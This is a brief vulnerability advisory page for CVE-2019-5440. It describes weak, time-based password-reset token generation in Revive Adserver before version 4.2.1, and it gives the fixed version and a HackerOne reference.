Unrated severityNVD Advisory· Published May 28, 2019· Updated Aug 4, 2024
CVE-2019-5440
CVE-2019-5440
Description
Use of cryptographically weak PRNG in the password recovery token generation of Revive Adserver < v4.2.1 causes a potential authentication bypass attack if an attacker exploits the password recovery functionality. In lib/OA/Dal/PasswordRecovery.php, the function generateRecoveryId() generates a password reset token that relies on the PHP uniqid function and consequently depends only on the current server time, which is often visible in an HTTP Date header.
Affected products
2- Range: <4.2.1
- Revive/Revive Adserverv5Range: Fixed in 4.2.1
Patches
Vulnerability mechanics
References
1- hackerone.com/reports/576504mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.